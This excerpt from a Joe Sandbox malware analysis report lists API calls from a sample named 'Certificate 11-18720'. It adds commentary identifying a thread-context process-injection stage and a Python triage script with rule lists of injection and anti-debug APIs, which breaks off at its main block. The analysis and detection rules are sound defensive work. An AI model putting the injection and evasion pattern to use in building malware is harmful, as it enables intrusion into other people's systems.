                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 1552873950-0
                                                                                    • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                    • Instruction ID: 449f1d9f11319794e4bfe621cd1307cdc29c388560a2da757af40d9838a7a4fc
                                                                                    • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                    • Instruction Fuzzy Hash: C5516EB1904219AFDF199F64DC85BAEBBB9FF48314F10409EB249E3281DB715E908F58
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005DEBB2
                                                                                      • Part of subcall function 005C51AF: _memset.LIBCMT ref: 005C522F
                                                                                      • Part of subcall function 005C51AF: _wcscpy.LIBCMT ref: 005C5283
                                                                                      • Part of subcall function 005C51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 005C5293
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 005DEC07
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005DEC16
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00633C88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1378193009-0
                                                                                    • Opcode ID: bf61db7e671b9551dcd5bba4c6ba21fcbe790fbcb6809ffe79f1a469b8cee6c9
                                                                                    • Instruction ID: eb4783b2691352a11ef07c797ba525fab21a1105a218b82b1c96cebd12cabb69
                                                                                    • Opcode Fuzzy Hash: bf61db7e671b9551dcd5bba4c6ba21fcbe790fbcb6809ffe79f1a469b8cee6c9
                                                                                    • Instruction Fuzzy Hash: BC21DA74904794AFE7339B288C59BE7BFEDAB01308F04144EE68A5A341C7742A85CB51
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0060C72F
                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0060C746
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: e4362dd6768a1bfac36492a1b960edfed7f655459c2e60da8154a6a5bc27d675
                                                                                    • Instruction ID: f2b6ce18b13820c8dc09ff4086cd9af2798897efa5ce376dd54dff4a50533f77
                                                                                    • Opcode Fuzzy Hash: e4362dd6768a1bfac36492a1b960edfed7f655459c2e60da8154a6a5bc27d675
                                                                                    • Instruction Fuzzy Hash: CAD05E7590030EABDB50ABA0DC0EF8B776D9700704F0001A0B754A50B1DAF0E7998B55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0226c177bb2236cb851a4041daeb658e9be4142e1915579509c7bf38faac82be
                                                                                    • Instruction ID: 691f9e1a8294460a3814dca4ae0e131a50a94c174d2bbb555348b9bc6327d35d
                                                                                    • Opcode Fuzzy Hash: 0226c177bb2236cb851a4041daeb658e9be4142e1915579509c7bf38faac82be
                                                                                    • Instruction Fuzzy Hash: CFF15C716083019FC714DF28C485BAABBE6BF88314F14892EF9959B392D731E945CF82
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005C5022
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 005C50CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell__memset
                                                                                    • String ID:
                                                                                    • API String ID: 928536360-0
                                                                                    • Opcode ID: 0564e70a08236ab30691e91ed03dd639c85b460c810904c869b69c1ae5903bd6
                                                                                    • Instruction ID: abb70ecdaa0355a165434f1390ceba58f8f2e726487651096abc016ecf063ea4
                                                                                    • Opcode Fuzzy Hash: 0564e70a08236ab30691e91ed03dd639c85b460c810904c869b69c1ae5903bd6
                                                                                    • Instruction Fuzzy Hash: 7531BFB0504701DFC320DFA4D848B9BBBE8FF49304F00192EE59AD7240E7716984CB92
                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 005E3973
                                                                                      • Part of subcall function 005E81C2: __NMSG_WRITE.LIBCMT ref: 005E81E9
                                                                                      • Part of subcall function 005E81C2: __NMSG_WRITE.LIBCMT ref: 005E81F3
                                                                                    • __NMSG_WRITE.LIBCMT ref: 005E397A
                                                                                      • Part of subcall function 005E821F: GetModuleFileNameW.KERNEL32(00000000,00680312,00000104,00000000,00000001,00000000), ref: 005E82B1
                                                                                      • Part of subcall function 005E821F: ___crtMessageBoxW.LIBCMT ref: 005E835F
                                                                                      • Part of subcall function 005E1145: ___crtCorExitProcess.LIBCMT ref: 005E114B
                                                                                      • Part of subcall function 005E1145: ExitProcess.KERNEL32 ref: 005E1154
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,005DF507,?,0000000E), ref: 005E399F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: 8e74673d30e7bb387eb006c758fbd542c88e1f85f21fa5bbce12752d88b94515
• Instruction ID: 28cad02e4baedcd65400b8559ca8373fe276f04dc32b3e9fc6d02e254ca5eb6b
• Opcode Fuzzy Hash: 8e74673d30e7bb387eb006c758fbd542c88e1f85f21fa5bbce12752d88b94515
• Instruction Fuzzy Hash: F501DB352456825AEB1D3F27DC4E63D2F48BBC1710F211525F589DB193DBB09D008664
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0060C385,?,?,?,?,?,00000004), ref: 0060C6F2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0060C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0060C708
• CloseHandle.KERNEL32(00000000,?,0060C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0060C70F
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 64003dd9e531e7f853585363c7231c694fdd98eba4826f4cb4ad337da1dd2a1f
• Instruction ID: 7aa5b83574d5ab27fcc9893c70699201f5fc54db83b899116bf222149f3535e8
• Opcode Fuzzy Hash: 64003dd9e531e7f853585363c7231c694fdd98eba4826f4cb4ad337da1dd2a1f
• Instruction Fuzzy Hash: 46E08636581214B7D7221F54AC09FCA7B1AAB06B70F104210FF14690E097B125118798
APIs
• _free.LIBCMT ref: 0060BB72
  • Part of subcall function 005E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,005E7A85), ref: 005E1CB1
  • Part of subcall function 005E1C9D: GetLastError.KERNEL32(00000000,?,005E7A85), ref: 005E1CC3
• _free.LIBCMT ref: 0060BB83
• _free.LIBCMT ref: 0060BB95
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
• Instruction ID: b2fd6adb8077d1b8a114082546091886a846e3b31657d229099a74d5cc139984
• Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
• Instruction Fuzzy Hash: 00E012B1681B8247DA2C657A6E4CEF327CC5F44355724181DB49EE7286CF74EC4085A8
APIs
  • Part of subcall function 005C22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005C24F1), ref: 005C2303
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005C25A1
• CoInitialize.OLE32(00000000), ref: 005C2618
• CloseHandle.KERNEL32(00000000), ref: 0063503A
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 3815369404-0
• Opcode ID: bfbfa06f4915a3d985c6e32daf741169657b56ba9b61dc0e45dba68341a9f56c
• Instruction ID: 454ca781059603ba71544a8c3d27a5311eb5b00280a9db631dd02df0120982d4
• Opcode Fuzzy Hash: bfbfa06f4915a3d985c6e32daf741169657b56ba9b61dc0e45dba68341a9f56c
• Instruction Fuzzy Hash: C27190B4901245AFC314EF5AA8A4555BEEFBB9B340B80632ED119CF271CB704682CF15
APIs
• _strcat.LIBCMT ref: 006208FD
  • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
  • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
• _wcscpy.LIBCMT ref: 0062098C
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: __itow__swprintf_strcat_wcscpy
• String ID:
• API String ID: 1012013722-0
• Opcode ID: 0793bddff5137c8e69fb1a335547fa32075864f8892a1a5d0c4a10a1c1ad4ca4
• Instruction ID: 6eb3b15d8f6d0306d000ba77bfeaa76e868de9eaea955fa1c0f9c2bd2a1b8b11
• Opcode Fuzzy Hash: 0793bddff5137c8e69fb1a335547fa32075864f8892a1a5d0c4a10a1c1ad4ca4
• Instruction Fuzzy Hash: 7C911734A00615DFDB18DF18D4959A9BBE6FF89310B54806AE85A8F3A3DB30ED41CF80
APIs
• IsThemeActive.UXTHEME ref: 005C3A73
  • Part of subcall function 005E1405: __lock.LIBCMT ref: 005E140B
  • Part of subcall function 005C3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 005C3AF3
  • Part of subcall function 005C3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005C3B08
  • Part of subcall function 005C3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,005C3AA3,?), ref: 005C3D45
  • Part of subcall function 005C3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,005C3AA3,?), ref: 005C3D57
  • Part of subcall function 005C3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00681148,00681130,?,?,?,?,005C3AA3,?), ref: 005C3DC8
  • Part of subcall function 005C3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,005C3AA3,?), ref: 005C3E48
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005C3AB3
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
• String ID:
• API String ID: 924797094-0
• Opcode ID: d5c05cf1d3153b34afbb1960fc64688accad3fa2c38d69156e2eb25dc5076dc8
• Instruction ID: 6967aca34753f7067fa734eee1f2e14656525cf04bdad5c318aac39d9c75a93c
• Opcode Fuzzy Hash: d5c05cf1d3153b34afbb1960fc64688accad3fa2c38d69156e2eb25dc5076dc8
• Instruction Fuzzy Hash: 27119D71904342AFC300EF69EC09A0ABFEAFFD5710F008A1FB584872A1DB7089518B92
APIs
• ___lock_fhandle.LIBCMT ref: 005EEA29
• __close_nolock.LIBCMT ref: 005EEA42
  • Part of subcall function 005E7BDA: __getptd_noexit.LIBCMT ref: 005E7BDA
  • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: __getptd_noexit$___lock_fhandle__close_nolock
• String ID:
• API String ID: 1046115767-0
• Opcode ID: dbcb577fee1aa588b469bb12b2a09170a5ad40fa6f4464c25fc2f955bfaa94a6
• Instruction ID: ef6b4164e030ffbf9f8454262021de91be00d6667b3c7d3ef518cf96877ddc47
• Opcode Fuzzy Hash: dbcb577fee1aa588b469bb12b2a09170a5ad40fa6f4464c25fc2f955bfaa94a6
• Instruction Fuzzy Hash: 2211E072819AD69AD719BF6AD84A3183E627FC1331F264754E4E40F1E3DBB48D008BA1
APIs
  • Part of subcall function 005E395C: __FF_MSGBANNER.LIBCMT ref: 005E3973
  • Part of subcall function 005E395C: __NMSG_WRITE.LIBCMT ref: 005E397A
  • Part of subcall function 005E395C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,005DF507,?,0000000E), ref: 005E399F
• std::exception::exception.LIBCMT ref: 005DF51E
• __CxxThrowException@8.LIBCMT ref: 005DF533
  • Part of subcall function 005E6805: RaiseException.KERNEL32(?,?,0000000E,00676A30,?,?,?,005DF538,0000000E,00676A30,?,00000001), ref: 005E6856
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
• Opcode ID: a9d367c56188a9574e2100cf3539f781db67c740855b740bd203eac76692ea98
• Instruction ID: 85d3c853564324b73cfe5e355f5254c44041e81308a25b6896d135adaca34d51
• Opcode Fuzzy Hash: a9d367c56188a9574e2100cf3539f781db67c740855b740bd203eac76692ea98
• Instruction Fuzzy Hash: DDF0AF3150425FA7DB18BFADE8099DE7FE9BF40394F604427F94AD2381DBB0968087A5
APIs
  • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
• __lock_file.LIBCMT ref: 005E3629
  • Part of subcall function 005E4E1C: __lock.LIBCMT ref: 005E4E3F
• __fclose_nolock.LIBCMT ref: 005E3634
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
• Opcode ID: 220fcc770ea7a873f89161c512a8e192737e4d9fb1af655c6881e7d33cf478df
• Instruction ID: 12b2f47b8c988c3ec63b5f0838ec89576cdf2889c3c64107b363cd38d548df12
• Opcode Fuzzy Hash: 220fcc770ea7a873f89161c512a8e192737e4d9fb1af655c6881e7d33cf478df
• Instruction Fuzzy Hash: C1F02B31800386AADB197F77C80E76E7EA47F90370F258108E4D4AB2C1C77C8A019F51
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00F45A43
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F45AD9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F45AFB
Memory Dump Source
• Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
• Instruction ID: ebbb7348ea0672ddbec757d467397b2c982d8b6878bf03411efa3302badb241d
• Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
• Instruction Fuzzy Hash: D512DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
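The block above is the one that matters for triage. CreateProcessW, Wow64GetThreadContext and ReadProcessMemory (a 4-byte read) issued from a region at 0x00F43000 that the sandbox could not map to a PE image ("based on PE: false") has the shape of a thread-context injection stage that was unpacked into memory at runtime, consistent with the "Modifies the context of a thread in another process" and "Writes to foreign memory regions" signatures in the overview, while the AutoIt runtime blocks backed by the image at 0x005C0000 (the earlier block that reaches IsDebuggerPresent only through a subcall) are mostly library noise. The script below, added here as an example and not part of the Joe Sandbox report, parses function listings in the text form shown on this page and flags exactly those three indicators: an injection API chain, anti-debug calls (marking ones reached via subcall), and code in unbacked memory. SAMPLE is constructed for the example in the report's format (addresses copied from this page, snapshot file names replaced by placeholders), and the API groupings in the rules are this example's own choices, not a Joe Sandbox signature set.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example).

Splits the listing at each "APIs" header, collects the API calls and the
"Memory Dump Source" line of every block, and flags blocks that match a
thread-context injection chain, call anti-debug APIs, or live in memory the
sandbox could not map to a PE image.  Rule contents are this example's own
choices, not a Joe Sandbox signature set.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample in the report's format: the two blocks discussed on this
# page, snapshot file names replaced by placeholders.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00F45A43
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F45AD9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F45AFB
Memory Dump Source
• Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f43000_sample.jbxd
APIs
• IsThemeActive.UXTHEME ref: 005C3A73
  • Part of subcall function 005C3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,005C3AA3,?), ref: 005C3D57
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005C3AB3
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_sample.jbxd
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<module>[A-Za-z0-9]+)"
)
SOURCE_RE = re.compile(
    r"Offset:\s*(?P<offset>[0-9A-Fa-f]+).*based on PE:\s*(?P<pe>true|false)"
)

# Stages of a thread-context injection chain; a hit needs create + context.
INJECTION_STAGES = {
    "create": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext",
                "SetThreadContext", "Wow64SetThreadContext"},
    "memory": {"ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
               "VirtualAllocEx", "NtUnmapViewOfSection"},
    "resume": {"ResumeThread", "NtResumeThread", "QueueUserAPC", "NtQueueApcThread"},
}
ANTI_DEBUG = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
              "NtQueryInformationProcess", "OutputDebugStringW", "OutputDebugStringA"}


@dataclass
class FunctionBlock:
    apis: List[Tuple[str, str, bool]] = field(default_factory=list)  # (name, module, via_subcall)
    offset: str = ""
    pe_backed: Optional[bool] = None


def parse_blocks(text: str) -> List[FunctionBlock]:
    """One FunctionBlock per "APIs" header, with its calls and dump-source facts."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["sub"] is not None))
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur.offset = m["offset"].upper()
            cur.pe_backed = m["pe"] == "true"
    return blocks


def _label(blk: FunctionBlock, name: str) -> str:
    """Mark APIs only reached through a subcall so the reader checks the callee."""
    direct = any(n == name and not sub for n, _, sub in blk.apis)
    return name if direct else f"{name} (subcall)"


def triage(text: str) -> List[dict]:
    """Return one finding per block that trips a rule; empty list means nothing flagged."""
    findings = []
    for blk in parse_blocks(text):
        names = {n for n, _, _ in blk.apis}
        hits = []
        stages = [s for s, apis in INJECTION_STAGES.items() if names & apis]
        if "create" in stages and "context" in stages:
            hits.append("thread-context injection chain: " + ", ".join(stages))
        dbg = sorted(names & ANTI_DEBUG)
        if dbg:
            hits.append("anti-debug: " + ", ".join(_label(blk, d) for d in dbg))
        if blk.pe_backed is False:
            hits.append("code in memory not backed by a PE image (unpacked or injected stage)")
        if hits:
            findings.append({"offset": blk.offset, "apis": sorted(names), "hits": hits})
    return findings


if __name__ == "__main__":
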